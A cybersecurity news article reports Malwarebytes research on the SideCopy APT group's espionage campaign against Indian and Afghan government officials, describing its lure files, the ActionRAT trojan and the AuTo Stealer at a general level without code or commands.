Indian and Afghan governments are being targeted by Pakistani hackers for stealing sensitive credentials from Google, Twitter, and Facebook. They used to stealthily access the government officials revealed by hacker’s news .com.
“Malwarebytes’ recent findings go into depth regarding the new techniques and tools utilized by the APT group known as Side Copy,” according to the portal, “which is so named because it attempts to mimic the infection chains linked with another gang tracked as SideWinder and mislead attribution.”
Malwarebytes researcher Hossein Jazi says the lures used by SideCopy APT are usually archived files with embedded LNK, Microsoft Publisher, or Trojanized Applications files. The embedded files are tailored to target government and military targets. As he explained, the embedded files are designed to target government and military officials in Afghanistan and India.
This latest discovery is crucial in light of recent disclosures that Meta took steps to disrupt the group’s destructive actions by utilizing romantic lures to compromise individuals with ties to the Afghan government, military, and law enforcement in Kabul. Afghan officials linked with the Administration Office of the President (AOP), as well as the Ministries of Foreign Affairs, Finance, and National Procurement Authority, have been targeted in a number of high-profile attacks. Similarly, the actor took several Microsoft Office documents from the Afghani government’s website, including information about identity cards, visas, and asset registrations, as well as names, numbers, and email addresses of officials. In cyber-espionage campaigns observed by Malwarebytes, targets open the lure document, resulting in the execution of a loader to drop a next-stage remote access Trojan known as ActionRAT. ActionRAT is capable of uploading files, executing commands from an attacker, and more. As part of the loader, a new information stealer, AuTo Stealer, was dropped. It is designed to collect Microsoft Office files, PDFs, text files, database files, and images before sending them to a remote server via HTML or TCP.
SideCopy APT’s tactics are not new. In September 2020, the cybersecurity firm Quick Heal informed the public about an espionage campaign targeting Indian defense units and armed forces personnel since at least 2019.
Cisco Talos researchers revealed earlier this July the hacking group’s proliferation of infection chains delivering bespoke and commodity remote access trojans such as CetaRAT, Allakore, and njRAT as part of what they described as an expansion of malware campaigns targeting Indian companies.